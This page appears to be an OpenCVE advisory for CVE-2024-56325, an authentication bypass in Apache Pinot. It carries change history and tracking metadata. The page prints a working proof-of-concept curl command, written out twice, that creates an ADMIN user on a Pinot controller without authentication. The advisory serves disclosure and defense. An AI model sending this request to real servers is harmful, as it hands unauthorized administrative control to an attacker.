If the path does not contain / and contain., authentication is not required.
Expected Normal Request and Response Example
curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users
Return: {"code":401,"error":"HTTP 401 Unauthorized"}
Malicious Request and Response Example
curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .
Return: {"users":{}}
A new user gets added bypassing authentication, enabling the user to control Pinot.
Analysis and contextual insights are available on OpenCVE Cloud.
No vendor fix or workaround currently provided.
Additional remediation guidance may be available on OpenCVE Cloud.
Tracking
Sign in to view the affected projects.
| Source | ID | Title |
|---|---|---|
EUVD |
EUVD-2025-9317 | Apache Pinot Vulnerable to Authentication Bypass |
Github GHSA |
GHSA-6jwp-4wvj-6597 | Apache Pinot Vulnerable to Authentication Bypass |
Wed, 16 Jul 2025 13:45:00 +0000
| Type | Values Removed | Values Added |
|---|---|---|
| Metrics |
epss
|
epss
|
Tue, 15 Jul 2025 20:00:00 +0000
| Type | Values Removed | Values Added |
|---|---|---|
| First Time appeared |
Apache
Apache pinot |
|
| CPEs | cpe:2.3:a:apache:pinot:*:*:*:*:*:*:*:* | |
| Vendors & Products |
Apache
Apache pinot |
Fri, 18 Apr 2025 15:15:00 +0000
| Type | Values Removed | Values Added |
|---|---|---|
| Metrics |
cvssV3_1
|
Tue, 01 Apr 2025 10:45:00 +0000
| Type | Values Removed | Values Added |
|---|---|---|
| References |
|
Tue, 01 Apr 2025 09:15:00 +0000
| Type | Values Removed | Values Added |
|---|---|---|
| Description | Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot. | |
| Title | Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required | |
| Weaknesses | CWE-288 | |
| References |
|
Status: PUBLISHED
Assigner: apache
Published:
Updated: 2025-10-27T17:11:08.160Z
Reserved: 2024-12-19T14:28:37.532Z
Link: CVE-2024-56325
Updated: 2025-04-01T10:03:56.094Z
Status : Analyzed
Published: 2025-04-01T09:15:15.240
Modified: 2025-07-15T19:49:46.407
Link: CVE-2024-56325
No data.
OpenCVE Enrichment
No data.
EUVD
Github GHSA